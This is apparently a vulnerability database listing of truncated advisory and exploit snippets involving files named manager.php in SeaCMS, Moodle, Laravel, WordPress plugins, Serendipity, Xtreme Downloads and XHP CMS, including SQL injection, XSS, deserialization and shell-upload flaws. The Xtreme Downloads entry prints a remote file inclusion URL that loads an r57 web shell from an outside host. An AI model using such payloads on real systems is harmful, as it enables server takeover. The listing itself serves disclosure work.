PT-2025-19805 · Seacms · Seacms

Name of the Vulnerable Software and Affected Versions: SeaCMS version 13.3 Description: A SQL injection issue was discovered in the admin manager.php component. Recommendations: For SeaCMS version 13.3, update to a version that fixes the SQL injection vulnerability in the admin manager.php...

Information Disclosure

moodle/moodle is vulnerable to information disclosure. The vulnerability exists because the activity attempts report does not properly filter by groups in the getreport function of manager.php, allowing an attacker to reveal the information about attempts or users in groups to non-editing teacher...

Remote Code Execution (RCE)

laravel/laravel is vulnerable to remote code execution. The vulnerability exists in destruct in PendingResourceRegistration.php, Manager.php, and ClosureWrapper.php which allows an attacker is able to inject malicious code via an unserialize pop chain...

SEOPanel 4.6.0 Cross Site Scripting

Hello, We are informing you about Cross-Site Scripting Vulnerabilities in SEOPanel 4.6.0. Information -------------------- Advisory by Netsparker Name: Cross-Site Scripting Vulnerabilities in SEOPanel Affected Software: SEOPanel Affected Versions: 4.6.0 Vendor Homepage: https://www.seopanel.org/...

WordPress ProfileGrid Plugin <= 2.6.6 - Reflected Cross Site Scripting

A reflected cross-site scripting vulnerability was found in ProfileGrid plugin in 2.6.6 version. The vulnerability exists in the file /admin/partials/user-manager.php. There some of $GET parameters are not escaped. For example: ifisset$GET‘search’ echo $GET‘search’; … Solution Update the plugin...

Serendipity 1.5.4 0day Arbitrary File Upload Vulnerability

No description provided by source. In The Name Of GOD + Exploit Title:remote 0day file upload + Date: 2010 + script:Serendipity 1.5.4 + Software Link: http://www.s9y.org/12.html + Author : pentesters.ir +discovered by:ahmadbady + Contact : [email protected] + Website : WwW.PenTesters.IR +...

Serendipity 1.5.4 Shell Upload

In The Name Of GOD + Exploit Title:remote 0day file upload + Date: 2010 + script:Serendipity 1.5.4 + Software Link: http://www.s9y.org/12.html + Author : pentesters.ir +discovered by:ahmadbady + Contact : [email protected] + Website : WwW.PenTesters.IR + Greeting: Behzad, navid,...

Wordpress Image Manager Plugins Shell Upload Vulnerability

Exploit for unknown platform in category web applications ========================================================== Wordpress Image Manager Plugins Shell Upload Vulnerability ========================================================== Exploit Title: Wordpress Image Manager Plugins Shell Upload...

CVE-2009-1913

CVE-2009-1913 affects LuxBum 0.5.5. The vulnerability is a SQL injection in the login flow, specifically in manager.php, triggered when magic_quotes_gpc is disabled and dotclear authentication is used. An attacker can remotely execute arbitrary SQL commands by supplying a crafted username value i...

Multiple file include exploits in Xtreme Downloads v.1.0

Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...

Design/Logic Flaw

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...

CVE-2006-1371

Laurentiu Matei eXpandable Home Page XHP CMS 0.5 and earlier allows remote authenticated users to use the HTMLArea FileManager plugin to upload and execute arbitrary PHP files using 1 manager.php, 2 standalonemanager.php, and 3 images.php...